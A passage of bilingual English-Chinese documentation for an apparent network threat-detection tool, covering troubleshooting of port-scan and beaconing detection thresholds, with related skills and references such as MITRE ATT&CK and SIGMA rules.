detector = NetworkDetector()
result = detector.detect_port_scan(logs, threshold=100) # 提高阈值Missing Detections
漏检已知威胁
Problem: Known malicious activity not detected
Solution: Review detection parameters and ensure complete log data:
python
undefined问题:已知恶意活动未被检测到
解决方案:检查检测参数并确保日志数据完整:
python
undefinedEnsure time windows align with attack patterns
确保时间窗口与攻击模式匹配
result = detector.detect_beaconing(logs, time_window=3600) # Longer window
undefinedresult = detector.detect_beaconing(logs, time_window=3600) # 更长的时间窗口
undefinedRelated Skills
相关技能
- incident-response: Respond to detected threats
- threat-intelligence: IOC correlation
- soc-operations: Alert triage workflows
- containment: Contain detected threats
- incident-response: 响应已检测到的威胁
- threat-intelligence: IOC关联分析
- soc-operations: 告警分诊工作流
- containment: 遏制已检测到的威胁
References
参考资料
- Detailed API Reference
- MITRE ATT&CK
- SIGMA Rules
- 详细API参考
- MITRE ATT&CK
- SIGMA规则